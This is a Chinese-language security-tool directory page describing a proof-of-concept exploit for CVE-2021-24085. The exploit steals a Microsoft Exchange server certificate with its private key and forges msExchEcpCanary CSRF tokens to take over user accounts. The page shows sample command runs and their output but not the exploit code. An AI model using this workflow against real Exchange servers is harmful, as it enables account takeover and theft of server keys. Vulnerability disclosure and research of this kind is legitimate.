Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/sourceincite/cve-2021-24085
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

CVE-2021-24085的概念验证漏洞利用:通过msExchEcpCanary令牌伪造实现基于CSRF的Microsoft Exchange Server权限提升,从而能够接管账户。

查看仓库
711825年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Microsoft Exchange Server msExchEcpCanary 跨站请求伪造特权提升漏洞

这是 CVE-2021-24085 的概念验证。

  1. poc.py 下载包含私钥的目标证书文件
  2. YellowCanary 根据 SID 为特定用户生成 msExchEcpCanary CSRF 令牌
  3. poc.js 是用于触发账户接管漏洞的 CSRF 利用代码

我没有提供 malicifest.xml 文件,但你可以从以下参考资料部分中找到关于如何生成恶意清单文件的信息。

示例

获取包含私钥的证书:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

现在你可以使用 YellowCanary 通过目标用户的 SID 生成 CSRF 令牌:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

参考资料:

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
下载工具